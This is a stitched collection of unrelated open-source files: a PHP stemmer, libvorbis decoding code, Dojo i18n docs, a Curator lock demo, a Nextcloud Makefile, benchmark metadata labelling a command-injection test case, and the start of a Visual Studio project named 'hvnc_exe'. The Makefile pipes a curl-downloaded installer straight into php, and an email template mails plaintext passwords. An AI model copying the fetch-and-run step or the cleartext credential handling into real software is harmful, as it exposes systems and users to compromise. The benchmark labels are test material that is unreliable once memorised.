                if (!self::replace($word, 'at', 'ate') and !self::replace($word, 'bl', 'ble') and !self::replace($word, 'iz', 'ize'))
                {
                    // Double consonant ending
                    if (self::doubleConsonant($word) and substr($word, -2) != 'll' and substr($word, -2) != 'ss' and substr($word, -2) != 'zz')
                    {
                        $word = substr($word, 0, -1);
                    }
                    elseif (self::m($word) == 1 and self::cvc($word))
                    {
                        $word .= 'e';
                    }
                }
            }
        }

        return $word;
    }

    /**
     * Step 1c: terminal y -> i when there is another vowel in the stem.
     *
     * @param string $word The token to stem.
     *
     * @return string
     *
     * @since 1.0
     */
    private static function step1c($word)
    {
        $v = self::$regex_vowel;

        if (substr($word, -1) == 'y' && preg_match("#$v+#", substr($word, 0, -1)))
        {
            self::replace($word, 'y', 'i');
        }

        return $word;
    }

    /**
     * Step 2: map double suffixes to single ones.
     *
     * @param string $word The token to stem.
     *
     * @return string
     *
     * @since 1.0
     */
    private static function step2($word)
    {
        switch (substr($word, -2, 1))
        {
            case 'a':
                self::replace($word, 'ational', 'ate', 0)
                or self::replace($word, 'tional', 'tion', 0);
                break;
            case 'c':
                self::replace($word, 'enci', 'ence', 0)
                or self::replace($word, 'anci', 'ance', 0);
                break;
            case 'e':
                self::replace($word, 'izer', 'ize', 0);
                break;
            case 'g':
                self::replace($word, 'logi', 'log', 0);
                break;
            case 'l':
                self::replace($word, 'entli', 'ent', 0)
                or self::replace($word, 'ousli', 'ous', 0)
                or self::replace($word, 'alli', 'al', 0)
                or self::replace($word, 'bli', 'ble', 0)
                or self::replace($word, 'eli', 'e', 0);
                break;
            case 'o':
                self::replace($word, 'ization', 'ize', 0)
                or self::replace($word, 'ation', 'ate', 0)
                or self::replace($word, 'ator', 'ate', 0);
                break;
            case 's':
                self::replace($word, 'iveness', 'ive', 0)
                or self::replace($word, 'fulness', 'ful', 0)
                or self::replace($word, 'ousness', 'ous', 0)
                or self::replace($word, 'alism', 'al', 0);
                break;
            case 't':
                self::replace($word, 'biliti', 'ble', 0)
                or self::replace($word, 'aliti', 'al', 0)
                or self::replace($word, 'iviti', 'ive', 0);
                break;
        }

        return $word;
    }

    /**
     * Step 3: -ic-, -full, -ness and similar suffixes.
     *
     * @param string $word The token to stem.
     *
     * @return string
     *
     * @since 1.0
     */
    private static function step3($word)
    {
        switch (substr($word, -2, 1))
        {
            case 'a':
                self::replace($word, 'ical', 'ic', 0);
                break;
            case 's':
                self::replace($word, 'ness', '', 0);
                break;
            case 't':
                self::replace($word, 'icate', 'ic', 0)
                or self::replace($word, 'iciti', 'ic', 0);
                break;
            case 'u':
                self::replace($word, 'ful', '', 0);
                break;
            case 'v':
                self::replace($word, 'ative', '', 0);
                break;
            case 'z':
                self::replace($word, 'alize', 'al', 0);
                break;
        }

        return $word;
    }

    /**
     * Step 4: remove remaining suffixes when the measure allows.
     *
     * @param string $word The token to stem.
     *
     * @return string
     *
     * @since 1.0
     */
    private static function step4($word)
    {
        switch (substr($word, -2, 1))
        {
            case 'a':
                self::replace($word, 'al', '', 1);
                break;
            case 'c':
                self::replace($word, 'ance', '', 1)
                or self::replace($word, 'ence', '', 1);
                break;
            case 'e':
                self::replace($word, 'er', '', 1);
                break;
            case 'i':
                self::replace($word, 'ic', '', 1);
                break;
            case 'l':
                self::replace($word, 'able', '', 1)
                or self::replace($word, 'ible', '', 1);
                break;
            case 'n':
                self::replace($word, 'ant', '', 1)
                or self::replace($word, 'ement', '', 1)
                or self::replace($word, 'ment', '', 1)
                or self::replace($word, 'ent', '', 1);
                break;
            case 'o':
                if (substr($word, -4) == 'tion' or substr($word, -4) == 'sion')
                {
                    self::replace($word, 'ion', '', 1);
                }
                else
                {
                    self::replace($word, 'ou', '', 1);
                }
                break;
            case 's':
                self::replace($word, 'ism', '', 1);
                break;
            case 't':
                self::replace($word, 'ate', '', 1)
                or self::replace($word, 'iti', '', 1);
                break;
            case 'u':
                self::replace($word, 'ous', '', 1);
                break;
            case 'v':
                self::replace($word, 'ive', '', 1);
                break;
            case 'z':
                self::replace($word, 'ize', '', 1);
                break;
        }

        return $word;
    }

    /**
     * Step 5: remove a final -e and reduce -ll where the measure allows.
     *
     * @param string $word The token to stem.
     *
     * @return string
     *
     * @since 1.0
     */
    private static function step5($word)
    {
        // Part a
        if (substr($word, -1) == 'e')
        {
            if (self::m(substr($word, 0, -1)) > 1)
            {
                self::replace($word, 'e', '');
            }
            elseif (self::m(substr($word, 0, -1)) == 1)
            {
                if (!self::cvc(substr($word, 0, -1)))
                {
                    self::replace($word, 'e', '');
                }
            }
        }

        // Part b
        if (self::m($word) > 1 and self::doubleConsonant($word) and substr($word, -1) == 'l')
        {
            $word = substr($word, 0, -1);
        }

        return $word;
    }

    /**
     * Replaces the first string with the second, at the end of the string. If third
     * arg is given, then the preceding string must match that m count at least.
     *
     * @param string &$str String to check
     * @param string $check Ending to check for
     * @param string $repl Replacement string
     * @param integer $m Optional minimum number of m() to meet
     *
     * @return boolean Whether the $check string was at the end
     * of the $str string. True does not necessarily mean
     * that it was replaced.
     *
     * @since 1.0
     */
    private static function replace(&$str, $check, $repl, $m = null)
    {
        $len = 0 - strlen($check);

        if (substr($str, $len) == $check)
        {
            $substr = substr($str, 0, $len);

            if (is_null($m) or self::m($substr) > $m)
            {
                $str = $substr . $repl;
            }

            return true;
        }

        return false;
    }

    /**
     * m() measures the number of consonant sequences in $str. if c is
     * a consonant sequence and v a vowel sequence, and <..> indicates arbitrary
     * presence,
     *
     * <c><v> gives 0
     * <c>vc<v> gives 1
     * <c>vcvc<v> gives 2
     * <c>vcvcvc<v> gives 3
     *
     * @param string $str The string to return the m count for
     *
     * @return integer The m count
     *
     * @since 1.0
     */
    private static function m($str)
    {
        $c = self::$regex_consonant;
        $v = self::$regex_vowel;

        $str = preg_replace("#^$c+#", '', $str);
        $str = preg_replace("#$v+$#", '', $str);

        preg_match_all("#($v+$c+)#", $str, $matches);

        return count($matches[1]);
    }

    /**
     * Returns true/false as to whether the given string contains two
     * of the same consonant next to each other at the end of the string.
     *
     * @param string $str String to check
     *
     * @return boolean Result
     *
     * @since 1.0
     */
    private static function doubleConsonant($str)
    {
        $c = self::$regex_consonant;

        // Curly-brace string offsets ($matches[0]{0}) were deprecated in
        // PHP 7.4 and removed in PHP 8; use bracket syntax instead.
        return preg_match("#$c{2}$#", $str, $matches) && $matches[0][0] == $matches[0][1];
    }

    /**
     * Checks for an ending CVC sequence where the second C is not W, X or Y.
     *
     * @param string $str String to check
     *
     * @return boolean Result
     *
     * @since 1.0
     */
    private static function cvc($str)
    {
        $c = self::$regex_consonant;
        $v = self::$regex_vowel;

        // Bug fix: the original used "$result = preg_match(...) and ..." which,
        // because '=' binds tighter than 'and', assigned only the preg_match()
        // result and silently discarded the w/x/y exclusion required by the
        // Porter algorithm.  The conditions are now combined explicitly.
        return preg_match("#($c$v$c)$#", $str, $matches)
            && strlen($matches[1]) == 3
            && $matches[1][2] != 'w'
            && $matches[1][2] != 'x'
            && $matches[1][2] != 'y';
    }
}
| {
"pile_set_name": "Github"
} |
<?php /* Email template: account-credentials notification.
   Expects view vars: $fullname, $username, $password, $sitename.
   (This comment block emits no output; PHP consumes the newline after '?>'.) */ ?>
Hi <?php echo $fullname; ?>,
Your login details are given below :
Username : <?php echo $username; ?>
Password : <?php echo $password; ?>
Login URL : <?php echo $this->Html->url(array('controller' => 'wzusers', 'action' => 'login'), true); ?>
Please change your password immediately after login.
-- <?php echo $sitename; ?> team
| {
"pile_set_name": "Github"
} |
/********************************************************************
* *
* THIS FILE IS PART OF THE OggVorbis SOFTWARE CODEC SOURCE CODE. *
* USE, DISTRIBUTION AND REPRODUCTION OF THIS LIBRARY SOURCE IS *
* GOVERNED BY A BSD-STYLE SOURCE LICENSE INCLUDED WITH THIS SOURCE *
* IN 'COPYING'. PLEASE READ THESE TERMS BEFORE DISTRIBUTING. *
* *
* THE OggVorbis SOURCE CODE IS (C) COPYRIGHT 1994-2015 *
* by the Xiph.Org Foundation https://xiph.org/ *
* *
********************************************************************
function: single-block PCM synthesis
********************************************************************/
#include <stdio.h>
#include <ogg/ogg.h>
#include "vorbis/codec.h"
#include "codec_internal.h"
#include "registry.h"
#include "misc.h"
#include "os.h"
/* Decode one Vorbis audio packet into vb's PCM workspace.
   Returns 0 on success, OV_ENOTAUDIO for a non-audio packet, or
   OV_EBADPACKET for malformed input / uninitialized state.  The actual
   floor/residue decode is delegated to the mapping's inverse(). */
int vorbis_synthesis(vorbis_block *vb,ogg_packet *op){
  /* Derive each pointer defensively; any may be unset if the caller
     handed us an uninitialized block/stream. */
  vorbis_dsp_state *vd= vb ? vb->vd : 0;
  private_state *b= vd ? vd->backend_state : 0;
  vorbis_info *vi= vd ? vd->vi : 0;
  codec_setup_info *ci= vi ? vi->codec_setup : 0;
  oggpack_buffer *opb=vb ? &vb->opb : 0;
  int type,mode,i;

  if (!vd || !b || !vi || !ci || !opb) {
    return OV_EBADPACKET;
  }

  /* first things first.  Make sure decode is ready */
  _vorbis_block_ripcord(vb);
  oggpack_readinit(opb,op->packet,op->bytes);

  /* Check the packet type */
  if(oggpack_read(opb,1)!=0){
    /* Oops.  This is not an audio data packet */
    return(OV_ENOTAUDIO);
  }

  /* read our mode and pre/post windowsize */
  mode=oggpack_read(opb,b->modebits);
  if(mode==-1){
    return(OV_EBADPACKET);
  }

  vb->mode=mode;
  if(!ci->mode_param[mode]){
    return(OV_EBADPACKET);
  }

  vb->W=ci->mode_param[mode]->blockflag;
  if(vb->W){

    /* this doesn't get mapped through mode selection as it's used
       only for window selection */
    vb->lW=oggpack_read(opb,1);
    vb->nW=oggpack_read(opb,1);
    if(vb->nW==-1){
      return(OV_EBADPACKET);
    }
  }else{
    vb->lW=0;
    vb->nW=0;
  }

  /* more setup: carry stream position info into the block */
  vb->granulepos=op->granulepos;
  vb->sequence=op->packetno;
  vb->eofflag=op->e_o_s;

  /* alloc pcm passback storage: one buffer per channel, sized by the
     current window's blocksize */
  vb->pcmend=ci->blocksizes[vb->W];
  vb->pcm=_vorbis_block_alloc(vb,sizeof(*vb->pcm)*vi->channels);
  for(i=0;i<vi->channels;i++)
    vb->pcm[i]=_vorbis_block_alloc(vb,vb->pcmend*sizeof(*vb->pcm[i]));

  /* unpack_header enforces range checking */
  type=ci->map_type[ci->mode_param[mode]->mapping];

  return(_mapping_P[type]->inverse(vb,ci->map_param[ci->mode_param[mode]->
                                                   mapping]));
}
/* used to track pcm position without actually performing decode.
   Useful for sequential 'fast forward'.
   Returns 0 on success, OV_ENOTAUDIO for a non-audio packet, or
   OV_EBADPACKET for malformed input / uninitialized state. */
int vorbis_synthesis_trackonly(vorbis_block *vb,ogg_packet *op){
  /* Defensive pointer derivation, mirroring vorbis_synthesis() above:
     the original dereferenced vb/vd/b unchecked, so an uninitialized
     block crashed here while failing cleanly in the full decode path. */
  vorbis_dsp_state *vd= vb ? vb->vd : 0;
  private_state *b= vd ? vd->backend_state : 0;
  vorbis_info *vi= vd ? vd->vi : 0;
  codec_setup_info *ci= vi ? vi->codec_setup : 0;
  oggpack_buffer *opb=vb ? &vb->opb : 0;
  int mode;

  if (!vd || !b || !vi || !ci || !opb) {
    return OV_EBADPACKET;
  }

  /* first things first.  Make sure decode is ready */
  _vorbis_block_ripcord(vb);
  oggpack_readinit(opb,op->packet,op->bytes);

  /* Check the packet type */
  if(oggpack_read(opb,1)!=0){
    /* Oops.  This is not an audio data packet */
    return(OV_ENOTAUDIO);
  }

  /* read our mode and pre/post windowsize */
  mode=oggpack_read(opb,b->modebits);
  if(mode==-1)return(OV_EBADPACKET);

  vb->mode=mode;
  if(!ci->mode_param[mode]){
    return(OV_EBADPACKET);
  }

  vb->W=ci->mode_param[mode]->blockflag;
  if(vb->W){
    vb->lW=oggpack_read(opb,1);
    vb->nW=oggpack_read(opb,1);
    if(vb->nW==-1)   return(OV_EBADPACKET);
  }else{
    vb->lW=0;
    vb->nW=0;
  }

  /* more setup: carry stream position info into the block */
  vb->granulepos=op->granulepos;
  vb->sequence=op->packetno;
  vb->eofflag=op->e_o_s;

  /* no pcm to process if vorbis_synthesis_trackonly was called on block */
  vb->pcmend=0;
  vb->pcm=NULL;

  return(0);
}
/* Return the blocksize (in samples) a packet will decode to, without
   decoding it, or a negative error code (OV_EFAULT / OV_ENOTAUDIO /
   OV_EBADPACKET) on malformed input. */
long vorbis_packet_blocksize(vorbis_info *vi,ogg_packet *op){
  codec_setup_info *ci=vi->codec_setup;
  oggpack_buffer opb;
  int mode;

  if(ci==NULL || ci->modes<=0){
    /* codec setup not properly initialized */
    return(OV_EFAULT);
  }

  oggpack_readinit(&opb,op->packet,op->bytes);

  /* Check the packet type */
  if(oggpack_read(&opb,1)!=0){
    /* Oops.  This is not an audio data packet */
    return(OV_ENOTAUDIO);
  }

  /* read our mode and pre/post windowsize; the mode number is coded in
     ilog(modes-1) bits */
  mode=oggpack_read(&opb,ov_ilog(ci->modes-1));
  if(mode==-1 || !ci->mode_param[mode])return(OV_EBADPACKET);
  return(ci->blocksizes[ci->mode_param[mode]->blockflag]);
}
/* set / clear half-sample-rate decode mode.  Returns 0 on success,
   -1 if the stream's small blocksize is too short to support it. */
int vorbis_synthesis_halfrate(vorbis_info *vi,int flag){
  codec_setup_info *setup=vi->codec_setup;

  /* right now, our MDCT can't handle < 64 sample windows. */
  if(flag && setup->blocksizes[0]<=64) return -1;

  setup->halfrate_flag = flag ? 1 : 0;
  return 0;
}
/* report whether half-sample-rate decode mode is currently enabled */
int vorbis_synthesis_halfrate_p(vorbis_info *vi){
  codec_setup_info *setup=vi->codec_setup;
  return setup->halfrate_flag;
}
| {
"pile_set_name": "Github"
} |
# 介绍
<!--
https://github.com/dojo/framework/blob/master/docs/en/i18n/introduction.md
commit 3064b7ce80fa19569f8975e9aa5d06718ca8decb
-->
Dojo 的 **`i18n`** 包解决了 web 应用程序国际化方面的诸多常见需求和挑战。
虽然其中大部分功能可作为独立模块使用,但它主要用于 Dojo 应用程序,以帮助渲染本地化的部件,包括高级消息、日期和数字格式化等。
| 功能 | 描述 |
| -------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| **本地化单个部件** | 每个部件实例都可以有自己的本地化设置,能够在单个应用程序中显示多套本地化数据。如果没有指定,部件将回退使用当前的根区域设置(root locale)。 |
| **精细控制的消息包** | 包可以被拆分并作用于单个部件,并且只有使用了某一个区域设置时才延迟加载。这样,消息包也可以充分利用应用程序其他资源使用的分层和按包交付技术。 |
| **本地化的消息、日期和数字格式** | 使用行业标准的 [Unicode CLDR 格式化](http://cldr.unicode.org/)规则。在构建时,会将用到的 CLDR 数据自动注入到应用程序中。 |
| **响应式的区域设置** | 与 Dojo 应用程序其他响应式的状态更改类似,当改变区域设置后,会自动重载消息,并重新渲染受影响的部件。<br>如果单独使用 `i18n` 模块(如用在非 dojo 应用程序中),则可以通过监听器的回调函数来指定区域变更事件。 |
| **可回退的区域设置检测** | 如果没有显式指定根区域,则必须确保设置了默认区域。<br>系统的区域设置(当运行在服务器端时,指进程或主机的区域设置)会与 `.dojorc` 中定义的区域列表匹配。如果支持系统的区域设置,则将其设置为默认值。否则,使用 `.dojorc` 中定义的默认区域。 |
# 基本用法
## 国际化部件
- 从单个默认语言开始(英语)。
> .dojorc
```ts
{
"build-app": {
"locale": "en"
}
}
```
> src/widgets/MyI18nWidget.tsx
**基于函数的部件:**
```tsx
import { create, tsx } from '@dojo/framework/core/vdom';
import i18n from '@dojo/framework/core/middleware/i18n';
import myWidgetMessageBundle from '../nls/en/MyI18nWidget.ts';
const factory = create({ i18n });
export default factory(function MyI18nWidget({ middleware: { i18n } }) {
const { messages } = i18n.localize(myWidgetMessageBundle);
return <div title={messages.title}>{messages.content}</div>;
});
```
**基于类的部件:**
```tsx
import { WidgetBase } from '@dojo/framework/core/WidgetBase';
import { tsx } from '@dojo/framework/core/vdom';
import I18nMixin from '@dojo/framework/core/mixins/I18n';
import myWidgetMessageBundle from '../nls/en/MyI18nWidget.ts';
export default class MyI18nWidget extends I18nMixin(WidgetBase) {
protected render() {
const { messages } = this.localizeBundle(myWidgetMessageBundle);
return <div title={messages.title}>{messages.content}</div>;
}
}
```
> src/nls/en/MyI18nWidget.ts
```ts
export default {
messages: {
title: 'Hello',
content: 'This is an internationalized widget'
}
};
```
## 添加部件的本地化语言包
- 支持两种语言 - 默认为英语,同时也支持法语翻译,任何将 `fr` 设置为主要语言的用户都会使用法语翻译。
> .dojorc
```ts
{
"build-app": {
"locale": "en",
"supportedLocales": [ "fr" ]
}
}
```
> src/nls/en/MyI18nWidget.ts
```ts
export default {
locales: {
fr: () => import('../fr/MyI18nWidget')
},
messages: {
title: 'Hello',
content: 'This is an internationalized widget'
}
};
```
> src/nls/fr/MyI18nWidget.ts
```ts
export default {
title: 'Bonjour',
content: 'Ceci est un widget internationalisé'
};
```
## 在应用程序中指定根区域
在应用程序中只使用基于函数的部件和 `i18n` 中间件,则意味着无需在应用程序的 `main.ts` 或 `main.tsx` 入口点添加引导代码(bootstrapping code)。使用 `@dojo/framework/core/middleware/i18n` 中的 `i18n` 中间件,可以在顶层的 `App` 部件中设置默认区域。尚未定义区域时,可设置默认区域。
> src/App.tsx
```ts
import { create, tsx } from '@dojo/framework/core/vdom';
import i18n from '@dojo/framework/core/middleware/i18n';

const factory = create({ i18n });
export default factory(function App({ middleware: { i18n } }) {
if (!i18n.get()) {
i18n.set({ locale: 'en-us', rtl: false });
}
return <div>{/* the application widgets */}</div>;
});
```
但是,如果应用程序使用了基于类的部件,例如来自 `@dojo/widgets` 套件中的部件,则需要在应用程序的注册表(registry)中定义默认区域。这需要使用 `@dojo/framework/core/mixins/I18n` 中的工具函数 `registryI18nInjector`。
> src/main.tsx
```ts
import renderer, { tsx } from '@dojo/framework/core/vdom';
import Registry from '@dojo/framework/core/Registry';
import { registerI18nInjector } from '@dojo/framework/core/mixins/I18n';
import App from './App';
const registry = new Registry();
registerI18nInjector({ locale: 'en-us', rtl: false }, registry);
const r = renderer(() => <App />);
r.mount({ registry });
```
## 更改应用程序中的区域设置
- 使用 [i18n 中间件](/learn/middleware/available-middleware#i18n),用户可在支持的区域设置之间进行选择,然后使用中间件的 `.set` API 更改区域。
**提醒:** 当同时使用基于类的部件和基于函数的部件时,此中间件应该与 [`registeri18nInjector`](/learn/i18n/internationalizing-a-dojo-application/#providing-locale-data-to-i18n-aware-widgets) 一起使用,以便将区域设置的变更以响应的方式传播给所有支持 i18n 的部件。
> src/widgets/LocaleChanger.tsx
```tsx
import { create, tsx } from '@dojo/framework/core/vdom';
import i18n from '@dojo/framework/core/middleware/i18n';
const factory = create({ i18n });
export default factory(function LocaleChanger({ middleware: { i18n } }) {
return (
<div>
<button
onclick={() => {
i18n.set({ locale: 'en' });
}}
>
English
</button>
<button
onclick={() => {
i18n.set({ locale: 'fr' });
}}
>
French
</button>
</div>
);
});
```
| {
"pile_set_name": "Github"
} |
package com.whirly.recipes;
import org.apache.curator.framework.CuratorFramework;
import org.apache.curator.framework.CuratorFrameworkFactory;
import org.apache.curator.framework.recipes.locks.InterProcessReadWriteLock;
import org.apache.curator.retry.ExponentialBackoffRetry;
import java.text.SimpleDateFormat;
import java.util.Date;
import java.util.concurrent.CountDownLatch;
/**
 * @program: curator-example
 * @description: Distributed read/write lock demo.  Order numbers generated
 *               while holding the read lock may contain duplicates (readers
 *               run concurrently), while those generated under the write
 *               lock are unique -- matching read/write lock semantics.
 * @author: 赖键锋
 * @create: 2019-01-22 01:13
 **/
public class SharedReentrantReadWriteLockTest {
    private static final int SECOND = 1000;
    private static final String lock_path = "/testZK/leader_selector";

    public static void main(String[] args) throws Exception {
        CuratorFramework client = ZKUtils.getClient();
        client.start();
        // todo: a ConnectionStateListener could be registered here
        System.out.println("Server connected...");

        final InterProcessReadWriteLock lock = new InterProcessReadWriteLock(client, lock_path);
        final CountDownLatch down = new CountDownLatch(1);

        for (int i = 0; i < 30; i++) {
            final int index = i;
            new Thread(new Runnable() {
                @Override
                public void run() {
                    // Even-numbered threads act as readers, odd as writers.
                    final boolean reader = (index % 2 == 0);
                    try {
                        down.await();

                        // Acquire first, and only release a lock that was
                        // actually acquired.  The original released in an
                        // outer finally block even when acquire() had
                        // failed (or await() was interrupted), triggering a
                        // spurious release exception.
                        if (reader) {
                            lock.readLock().acquire();
                        } else {
                            lock.writeLock().acquire();
                        }
                        try {
                            SimpleDateFormat sdf = new SimpleDateFormat("HH:mm:ss|SSS");
                            String orderNo = sdf.format(new Date());
                            if (reader) {
                                System.out.println("[READ]生成的订单号是:" + orderNo);
                            } else {
                                System.out.println("[WRITE]生成的订单号是:" + orderNo);
                            }
                        } finally {
                            if (reader) {
                                lock.readLock().release();
                            } else {
                                lock.writeLock().release();
                            }
                        }
                    } catch (Exception e) {
                        e.printStackTrace();
                    }
                }
            }).start();
        }

        // Release all worker threads at (roughly) the same instant.
        down.countDown();
        Thread.sleep(10 * SECOND);

        if (client != null) {
            client.close();
        }
        System.out.println("Server closed...");
    }
}
| {
"pile_set_name": "Github"
} |
<test-metadata>
<benchmark-version>1.2</benchmark-version>
<category>cmdi</category>
<test-number>01928</test-number>
<vulnerability>true</vulnerability>
<cwe>78</cwe>
</test-metadata>
| {
"pile_set_name": "Github"
} |
<?php
function foo() {
if (rand(0,1)) {
return 1;
} else {
return 2;
}
}
function bar() {
if (rand(0,1)) {
return 1;
} else {
return 2;
}
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright Red Hat Inc. and/or its affiliates and other contributors
* as indicated by the authors tag. All rights reserved.
*
* This copyrighted material is made available to anyone wishing to use,
* modify, copy, or redistribute it subject to the terms and conditions
* of the GNU General Public License version 2.
*
* This particular file is subject to the "Classpath" exception as provided in the
* LICENSE file that accompanied this code.
*
* This program is distributed in the hope that it will be useful, but WITHOUT A
* WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
* PARTICULAR PURPOSE. See the GNU General Public License for more details.
* You should have received a copy of the GNU General Public License,
* along with this distribution; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
* MA 02110-1301, USA.
*/
@noanno
void comp2(Integer[] ints) {
value i2 = {for (i in ints) for (j in ints) i*2+3/j };
} | {
"pile_set_name": "Github"
} |
<Type Name="PPModule" FullName="PepperSharp.PPModule">
<TypeSignature Language="C#" Value="public struct PPModule" />
<TypeSignature Language="ILAsm" Value=".class public sequential ansi sealed beforefieldinit PPModule extends System.ValueType" />
<AssemblyInfo>
<AssemblyName>Xamarin.PepperSharp</AssemblyName>
<AssemblyVersion>1.0.0.0</AssemblyVersion>
</AssemblyInfo>
<Base>
<BaseTypeName>System.ValueType</BaseTypeName>
</Base>
<Interfaces />
<Docs>
<summary>To be added.</summary>
<remarks>To be added.</remarks>
</Docs>
<Members />
</Type>
| {
"pile_set_name": "Github"
} |
# This file is licensed under the Affero General Public License version 3 or
# later. See the COPYING file.
# @author Bernhard Posselt <[email protected]>
# @copyright Bernhard Posselt 2016
# Generic Makefile for building and packaging a Nextcloud app which uses npm and
# Composer.
#
# Dependencies:
# * make
# * which
# * curl: used if phpunit and composer are not installed to fetch them from the web
# * tar: for building the archive
# * npm: for building and testing everything JS
#
# If no composer.json is in the app root directory, the Composer step
# will be skipped. The same goes for the package.json which can be located in
# the app root or the js/ directory.
#
# The npm command by launches the npm build script:
#
# npm run build
#
# The npm test command launches the npm test script:
#
# npm run test
#
# The idea behind this is to be completely testing and build tool agnostic. All
# build tools and additional package managers should be installed locally in
# your project, since this won't pollute people's global namespace.
#
# The following npm scripts in your package.json install the npm dependencies
# and use gulp as build system (notice how everything is run from the
# node_modules folder):
#
# "scripts": {
# "test": "node node_modules/gulp-cli/bin/gulp.js karma",
# "prebuild": "npm install",
# "build": "node node_modules/gulp-cli/bin/gulp.js"
# },
app_name:=$(notdir $(CURDIR))
build_tools_directory:=$(CURDIR)/build/tools
source_build_directory:=$(CURDIR)/build/source/$(app_name)
source_artifact_directory:=$(CURDIR)/build/artifacts/source
source_package_name:=$(source_artifact_directory)/$(app_name)
appstore_build_directory:=$(CURDIR)/build/appstore/$(app_name)
appstore_artifact_directory:=$(CURDIR)/build/artifacts/appstore
appstore_package_name:=$(appstore_artifact_directory)/$(app_name)
npm:=$(shell which npm 2> /dev/null)
composer:=$(shell which composer 2> /dev/null)
ifeq (,$(composer))
composer:=php $(build_tools_directory)/composer.phar
endif
# code signing
# assumes the following:
# * the app is inside the nextcloud/apps folder
# * the private key is located in ~/.nextcloud/news.key
# * the certificate is located in ~/.nextcloud/news.crt
occ:=$(CURDIR)/../../occ
private_key:=$(HOME)/.nextcloud/$(app_name).key
certificate:=$(HOME)/.nextcloud/$(app_name).crt
sign:=php -f $(occ) integrity:sign-app --privateKey="$(private_key)" --certificate="$(certificate)"
sign_skip_msg:="Skipping signing, either no key and certificate found in $(private_key) and $(certificate) or occ can not be found at $(occ)"
ifneq (,$(wildcard $(private_key)))
ifneq (,$(wildcard $(certificate)))
ifneq (,$(wildcard $(occ)))
CAN_SIGN=true
endif
endif
endif
all: build
# Fetches the PHP and JS dependencies and compiles the JS. If no composer.json
# is present, the composer step is skipped, if no package.json or js/package.json
# is present, the npm step is skipped
.PHONY: build
build:
$(MAKE) composer
$(MAKE) npm
# Installs and updates the composer dependencies. If composer is not installed
# a copy is fetched from the web
.PHONY: composer
composer:
ifeq (, $(shell which composer 2> /dev/null))
@echo "No composer command available, downloading a copy from the web"
mkdir -p $(build_tools_directory)
curl -sS https://getcomposer.org/installer | php
mv composer.phar $(build_tools_directory)
endif
$(composer) install --prefer-dist --no-dev
# Installs npm dependencies
.PHONY: npm
npm:
ifneq (, $(npm))
cd js && $(npm) run build
else
@echo "npm command not available, please install nodejs first"
@exit 1
endif
# Removes the appstore build
.PHONY: clean
clean:
rm -rf ./build
# Reports PHP codestyle violations
.PHONY: phpcs
phpcs:
./vendor/bin/phpcs --standard=PSR2 --ignore=lib/Migration/Version*.php lib
# Reports PHP static violations
.PHONY: phpstan
phpstan:
./vendor/bin/phpstan analyse --level=1 lib
# Same as clean but also removes dependencies installed by composer and
# npm
.PHONY: distclean
distclean: clean
rm -rf vendor
rm -rf node_modules
rm -rf js/node_modules
# Builds the source and appstore package
.PHONY: dist
dist:
make distclean
make build
make source
make appstore
# Builds the source package
.PHONY: source
source:
rm -rf $(source_build_directory) $(source_artifact_directory)
mkdir -p $(source_build_directory) $(source_artifact_directory)
rsync -rv . $(source_build_directory) \
--exclude=/.git/ \
--exclude=/.idea/ \
--exclude=/build/ \
--exclude=/js/node_modules/ \
--exclude=*.log
ifdef CAN_SIGN
$(sign) --path "$(source_build_directory)"
else
@echo $(sign_skip_msg)
endif
tar -cvzf $(source_package_name).tar.gz -C $(source_build_directory)/../ $(app_name)
# Builds the source package for the app store, ignores php and js tests
.PHONY: appstore
appstore:
rm -rf $(appstore_build_directory) $(appstore_artifact_directory)
mkdir -p $(appstore_build_directory) $(appstore_artifact_directory)
./bin/tools/generate_authors.php
cp -r \
"appinfo" \
"css" \
"img" \
"l10n" \
"lib" \
"templates" \
"vendor" \
"COPYING" \
"AUTHORS.md" \
"CHANGELOG.md" \
$(appstore_build_directory)
#remove stray .htaccess files since they are filtered by nextcloud
find $(appstore_build_directory) -name .htaccess -exec rm {} \;
# on macOS there is no option "--parents" for the "cp" command
mkdir -p $(appstore_build_directory)/js/build $(appstore_build_directory)/js/admin
cp js/build/app.min.js $(appstore_build_directory)/js/build
cp js/admin/Admin.js $(appstore_build_directory)/js/admin
ifdef CAN_SIGN
$(sign) --path="$(appstore_build_directory)"
else
@echo $(sign_skip_msg)
endif
tar -czf $(appstore_package_name).tar.gz -C $(appstore_build_directory)/../ $(app_name)
.PHONY: js-test
js-test:
cd js && $(npm) run test
.PHONY: php-test-dependencies
php-test-dependencies:
$(composer) update --prefer-dist
.PHONY: unit-test
unit-test:
./vendor/phpunit/phpunit/phpunit -c phpunit.xml --coverage-clover build/php-unit.clover
# \Test\TestCase is only allowed to access the db if TRAVIS environment variable is set
.PHONY: integration-test
integration-test:
env TRAVIS=1 ./vendor/phpunit/phpunit/phpunit -c phpunit.integration.xml
# Command for running JS and PHP tests. Works for package.json files in the js/
# and root directory. If phpunit is not installed systemwide, a copy is fetched
# from the internet
.PHONY: test
test: php-test-dependencies
$(MAKE) unit-test
$(MAKE) integration-test
$(MAKE) phpcs
$(MAKE) phpstan
$(MAKE) js-test
./bin/tools/generate_authors.php
| {
"pile_set_name": "Github"
} |
fn:format-date( xs:date("2010-12-31"), "[Dw]", "en-US", (), () ) eq "thirty one"
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="windows-1251"?>
<VisualStudioProject
ProjectType="Visual C++"
Version="9,00"
Name="hvnc_exe"
ProjectGUID="{4E840B10-369A-4F4A-8D76-95801A48DE59}"
RootNamespace="hvnc_exe"
Keyword="Win32Proj"
TargetFrameworkVersion="196613"
>
<Platforms>
<Platform
Name="Win32"
/>
</Platforms>
<ToolFiles>
</ToolFiles>
<Configurations>
<Configuration
Name="Debug|Win32"
OutputDirectory="$(SolutionDir)$(ConfigurationName)"
IntermediateDirectory="$(ConfigurationName)"
ConfigurationType="1"
CharacterSet="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="0"
PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS"
MinimalRebuild="true"
BasicRuntimeChecks="3"
RuntimeLibrary="3"
UsePrecompiledHeader="0"
WarningLevel="3"
